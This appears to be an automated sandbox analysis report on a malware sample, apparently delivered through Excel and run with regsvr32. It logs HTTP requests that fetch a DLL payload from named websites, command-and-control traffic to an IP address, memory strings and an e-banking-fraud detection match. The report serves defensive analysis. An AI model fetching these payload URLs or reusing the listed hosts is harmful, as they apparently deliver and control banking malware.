Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: EcobandGH EcobandGH
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: QIerciqTmKVMTalY=ZNu1qVV4648TLcWc9PPurZOk8Euzv2esBBYSgK+0qI7gqkg7BYL3F0mCxQgzQRyD5wFY7LKdM3+m6rzAWA7DM0zlGdOu9mA+uitu6Au4yztsyCFHh5OpKU22gqXtPhtVuPee01EQS+Zfbc11xfPG5H+RbXgi6TGtiNnVWQj9vku1x5cT4DQp5DbsaxbTUVxBqIRQ6Zp9JoWXziesjQBhwb098hRQoA==Host: 218.38.121.17
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: SoHpbOHll=S1ZaEV/2K+G2MuFR5aWJIrFZWKJ6BUgx2VARY+iQICyCR3IjoBJq+ugHbhYuoa/1EyVyNWv+NFsl7eeESQnqDpazHNIhxXrZoY/Vuf2vmUqGl6dUPaa4tJ0lwsWfZmrxJ7pEDSggisnX+azuZvVEIAxjw6MoQMrIX6LHhpMhUlw6eJmGasOFasTPM8tRLJgpALsu1FrL12a9RO9cEVaRDYWnxpnpdi1nRvXITNoIrml15gO1b66MMFvst35GgkHSH4wY0dfE/LeROelUM6svgfP9p8M/xbXjvu2jNncQnCwlRNDoB1qZ0If0i6ltN2YsK7d/Host: 218.38.121.17
Source: Joe Sandbox View IP Address: 188.165.79.151 188.165.79.151
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 15 Nov 2022 11:40:12 GMTContent-Type: application/x-msdownloadContent-Length: 769024Connection: keep-aliveX-Powered-By: PHP/7.3.0Set-Cookie: 63737a9ce6e7a=1668512412; expires=Tue, 15-Nov-2022 11:41:12 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Tue, 15 Nov 2022 11:40:12 GMTExpires: Tue, 15 Nov 2022 11:40:12 GMTContent-Disposition: attachment; filename="40hd04O0.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 d9 25 ba ec b8 4b e9 ec b8 4b e9 ec b8 4b e9 9a 25 26 e9 eb b8 4b e9 cb 7e 36 e9 e7 b8 4b e9 cb 7e 26 e9 43 b8 4b e9 9a 25 30 e9 fb b8 4b e9 ec b8 4a e9 f8 ba 4b e9 cb 7e 25 e9 76 b8 4b e9 cb 7e 31 e9 ed b8 4b e9 cb 7e 33 e9 ed b8 4b e9 52 69 63 68 ec b8 4b e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 b6 15 64 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 5a 05 00 00 5e 06 00 00 00 00 00 60 23 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 60 0c 00 00 04 00 00 a8 56 0c 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 f8 0a 00 4f 00 00 00 50 d5 0a 00 dc 00 00 00 00 10 0c 00 b0 00 00 00 00 a0 0b 00 7c 65 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 c4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 10 0b 00 00 b0 d4 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 59 05 00 00 10 00 00 00 5a 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7f 88 05 00 00 70 05 00 00 8a 05 00 00 5e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 9d 00 00 00 00 0b 00 00 3a 00 00 00 e8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 7c 65 00 00 00 a0 0b 00 00 66 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b0 00 00 00 00 10 0c 00 00 02 00 00 00 88 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 30 00 00 00 20 0c 00 00 32 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KKK%&K~6K
Source: unknown HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: global traffic HTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075
Source: global traffic HTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079
Source: global traffic HTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075
Source: global traffic HTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
Source: unknown Network traffic detected: IP country count 21
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:40:10 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Powered-By: PrestaShopStatus: 404 Not FoundSet-Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7u4EN7ldFY91oSo8hffAyJadQKSdMuXRfEPnyOP0LrcMPyEqQYzhnB8nK%2F56PKGV92LhwlADR0Cai9xEpKkyPgYTgxlYN3LtX9AYwD4O0bLpA%3D000115; expires=Mon, 05-Dec-2022 11:40:10 GMT; Max-Age=1728000; path=/; domain=www.spinbalence.com; secure; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:40:11 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Status: 404 Not FoundSet-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSftoVdV7kvSqSpdfLt4fdwNPMCppuBx0MZGFj5jTVvcGNOjxE63v9YLetElu6JEvu5ONuoJotfg%2BX0z1PXLVMbs%3D000115; expires=Mon, 05-Dec-2022 11:40:11 GMT; Max-Age=1728000; path=/; domain=www.3d-stickers.com; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: unknown TCP traffic detected without corresponding DNS query: 218.38.121.17
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000009.00000002.1210700367.00000000003E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151735990.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151526148.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://218.38.121.17/
Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.co
Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll Jump to behavior
Source: unknown DNS traffic detected: queries for: sat7ate.com
Source: global traffic HTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075
Source: global traffic HTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079
Source: global traffic HTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: QIerciqTmKVMTalY=ZNu1qVV4648TLcWc9PPurZOk8Euzv2esBBYSgK+0qI7gqkg7BYL3F0mCxQgzQRyD5wFY7LKdM3+m6rzAWA7DM0zlGdOu9mA+uitu6Au4yztsyCFHh5OpKU22gqXtPhtVuPee01EQS+Zfbc11xfPG5H+RbXgi6TGtiNnVWQj9vku1x5cT4DQp5DbsaxbTUVxBqIRQ6Zp9JoWXziesjQBhwb098hRQoA==Host: 218.38.121.17
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: SoHpbOHll=S1ZaEV/2K+G2MuFR5aWJIrFZWKJ6BUgx2VARY+iQICyCR3IjoBJq+ugHbhYuoa/1EyVyNWv+NFsl7eeESQnqDpazHNIhxXrZoY/Vuf2vmUqGl6dUPaa4tJ0lwsWfZmrxJ7pEDSggisnX+azuZvVEIAxjw6MoQMrIX6LHhpMhUlw6eJmGasOFasTPM8tRLJgpALsu1FrL12a9RO9cEVaRDYWnxpnpdi1nRvXITNoIrml15gO1b66MMFvst35GgkHSH4wY0dfE/LeROelUM6svgfP9p8M/xbXjvu2jNncQnCwlRNDoB1qZ0If0i6ltN2YsK7d/Host: 218.38.121.17
Source: global traffic HTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10025238 GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow, 8_2_10025238
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10014B20 GetKeyState,GetKeyState,GetKeyState,SendMessageA, 8_2_10014B20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10025C50 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 8_2_10025C50

E-Banking Fraud

barindex
Source: Yara match File source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
